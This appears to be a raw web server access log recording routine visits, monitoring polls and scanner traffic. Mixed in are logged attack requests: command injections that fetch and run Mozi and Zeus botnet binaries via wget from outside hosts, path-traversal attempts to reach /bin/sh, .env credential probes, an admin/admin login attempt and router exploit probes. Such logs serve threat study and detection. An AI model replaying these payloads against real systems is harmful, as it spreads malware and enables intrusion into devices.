37.120.142.22 - - [02/Mar/2022:05:08:11 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
45.146.165.37 - - [02/Mar/2022:05:08:51 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
52.204.88.99 - - [02/Mar/2022:05:10:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/57.0.3030.56 Safari/537.32"
193.118.53.202 - - [02/Mar/2022:05:12:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
138.118.235.142 - - [02/Mar/2022:05:12:20 +0100] "GET / HTTP/1.1" 400 329 "-" "-"
185.180.143.8 - - [02/Mar/2022:05:12:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
66.63.177.190 - - [02/Mar/2022:05:14:40 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
45.146.165.37 - - [02/Mar/2022:05:15:03 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
61.54.218.252 - - [02/Mar/2022:05:15:25 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://61.54.218.252:47955/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" 404 310 "-" "-"
45.137.21.141 - - [02/Mar/2022:05:15:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.146.165.37 - - [02/Mar/2022:05:18:46 +0100] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 333 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
66.63.177.190 - - [02/Mar/2022:05:21:13 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
66.63.177.190 - - [02/Mar/2022:05:22:51 +0100] "HEAD /robots.txt HTTP/1.0" 404 - "-" "-"
82.76.165.109 - - [02/Mar/2022:05:24:37 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
82.76.165.109 - - [02/Mar/2022:05:24:37 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:05:25:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
71.6.232.4 - - [02/Mar/2022:05:25:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
34.96.130.2 - - [02/Mar/2022:05:27:25 +0100] "\x16\x03\x01" 501 318 "-" "-"
45.146.165.37 - - [02/Mar/2022:05:27:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
27.217.68.221 - - [02/Mar/2022:05:27:46 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://27.217.68.221:33172/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
45.146.165.37 - - [02/Mar/2022:05:28:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:05:30:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:05:33:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.176.43.226 - - [02/Mar/2022:05:35:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
27.47.41.85 - - [02/Mar/2022:05:35:51 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
37.120.142.22 - - [02/Mar/2022:05:37:28 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
37.120.142.22 - - [02/Mar/2022:05:37:28 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
37.120.142.22 - - [02/Mar/2022:05:37:28 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
45.146.165.37 - - [02/Mar/2022:05:38:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
59.99.198.236 - - [02/Mar/2022:05:39:36 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
45.146.165.37 - - [02/Mar/2022:05:40:07 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:05:43:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:05:44:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.146.165.37 - - [02/Mar/2022:05:46:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
220.92.30.4 - - [02/Mar/2022:05:50:48 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 107.172.157.131/bins/Zeus.arm;chmod+777+/tmp/Zeus.arm;sh+/tmp/Zeus.arm Zeus.jaws HTTP/1.1" 404 306 "-" "Hello, world"
103.101.115.202 - - [02/Mar/2022:05:52:06 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
157.230.216.203 - - [02/Mar/2022:05:56:15 +0100] "GET /ab2g HTTP/1.1" 400 329 "-" "-"
157.230.216.203 - - [02/Mar/2022:05:56:15 +0100] "GET /ab2h HTTP/1.1" 400 329 "-" "-"
23.95.246.102 - - [02/Mar/2022:06:03:34 +0100] "GET / HTTP/1.1" 200 1229 "http://212.91.246.84:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
185.180.143.138 - - [02/Mar/2022:06:03:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
115.50.22.115 - - [02/Mar/2022:06:11:39 +0100] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 324 "-" "-"
172.104.138.223 - - [02/Mar/2022:06:12:12 +0100] "GET /fuN3 HTTP/1.0" 404 305 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36"
181.214.231.105 - - [02/Mar/2022:06:15:14 +0100] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
71.6.232.4 - - [02/Mar/2022:06:45:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
75.119.145.87 - - [02/Mar/2022:06:46:32 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
178.216.24.49 - - [02/Mar/2022:06:51:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
194.31.98.171 - - [02/Mar/2022:06:57:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
194.31.98.171 - - [02/Mar/2022:06:57:48 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [02/Mar/2022:07:00:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:01:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
91.243.167.188 - - [02/Mar/2022:07:01:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [02/Mar/2022:07:02:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:03:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:04:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:05:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:06:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:07:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:08:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:09:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:10:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:11:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.55.225.117 - - [02/Mar/2022:07:11:20 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2022:07:12:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
61.3.188.199 - - [02/Mar/2022:07:12:31 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
94.55.225.117 - - [02/Mar/2022:07:12:47 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2022:07:13:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:14:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:15:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:16:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:17:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.55.225.117 - - [02/Mar/2022:07:17:26 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
94.55.225.117 - - [02/Mar/2022:07:17:35 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2022:07:18:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.55.225.117 - - [02/Mar/2022:07:18:21 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
94.55.225.117 - - [02/Mar/2022:07:18:40 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.192.241.99 - - [02/Mar/2022:07:18:50 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
94.55.225.117 - - [02/Mar/2022:07:18:51 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
94.55.225.117 - - [02/Mar/2022:07:18:57 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2022:07:19:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:20:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.55.225.117 - - [02/Mar/2022:07:20:55 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2022:07:21:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
15.204.130.187 - - [02/Mar/2022:07:21:23 +0100] "GET / HTTP/1.1" 200 1229 "http://212.91.246.88:80/left.html" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0"
180.211.183.118 - - [02/Mar/2022:07:21:32 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [02/Mar/2022:07:22:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:23:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
94.55.225.117 - - [02/Mar/2022:07:23:42 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2022:07:24:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:25:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:26:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:27:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:28:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:29:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:30:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:31:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:32:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:33:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:34:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
37.120.142.22 - - [02/Mar/2022:07:35:08 +0100] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
37.120.142.22 - - [02/Mar/2022:07:35:08 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
37.120.142.22 - - [02/Mar/2022:07:35:08 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
45.137.23.152 - - [02/Mar/2022:07:35:11 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [02/Mar/2022:07:35:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [02/Mar/2022:07:35:46 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
223.149.161.22 - - [02/Mar/2022:07:35:42 +0100] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
45.137.23.152 - - [02/Mar/2022:07:36:05 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [02/Mar/2022:07:36:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:37:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:38:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:39:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:40:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:41:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
170.130.187.22 - - [02/Mar/2022:07:41:57 +0100] "GET / HTTP/1.0" 200 1229 "-" "https://gdnplus.com:Gather Analyze Provide."
212.91.246.72 - - [02/Mar/2022:07:42:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:43:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [02/Mar/2022:07:43:22 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
45.137.23.152 - - [02/Mar/2022:07:44:01 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [02/Mar/2022:07:44:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:45:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [02/Mar/2022:07:46:03 +0100] "GET /doc/script/lib/seajs/config/sea-config.js HTTP/1.1" 404 346 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [02/Mar/2022:07:46:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
88.248.195.56 - - [02/Mar/2022:07:46:41 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2022:07:47:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.227.254.55 - - [02/Mar/2022:07:47:42 +0100] "\x03" 501 316 "-" "-"
45.227.254.55 - - [02/Mar/2022:07:47:42 +0100] "\x03" 501 316 "-" "-"
88.248.195.56 - - [02/Mar/2022:07:47:57 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2022:07:48:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:49:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:50:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
88.248.195.56 - - [02/Mar/2022:07:51:08 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
167.94.138.118 - - [02/Mar/2022:07:51:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.138.118 - - [02/Mar/2022:07:51:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.138.118 - - [02/Mar/2022:07:51:10 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
212.91.246.72 - - [02/Mar/2022:07:51:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
88.248.195.56 - - [02/Mar/2022:07:51:37 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2022:07:52:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
88.248.195.56 - - [02/Mar/2022:07:52:22 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
88.248.195.56 - - [02/Mar/2022:07:52:34 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
88.248.195.56 - - [02/Mar/2022:07:52:46 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
88.248.195.56 - - [02/Mar/2022:07:52:51 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2022:07:53:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:54:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
88.248.195.56 - - [02/Mar/2022:07:54:30 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2022:07:55:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:56:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
88.248.195.56 - - [02/Mar/2022:07:56:42 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
75.119.145.87 - - [02/Mar/2022:07:56:44 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [02/Mar/2022:07:57:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:07:58:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
31.220.3.140 - - [02/Mar/2022:07:58:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
31.220.3.140 - - [02/Mar/2022:07:58:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
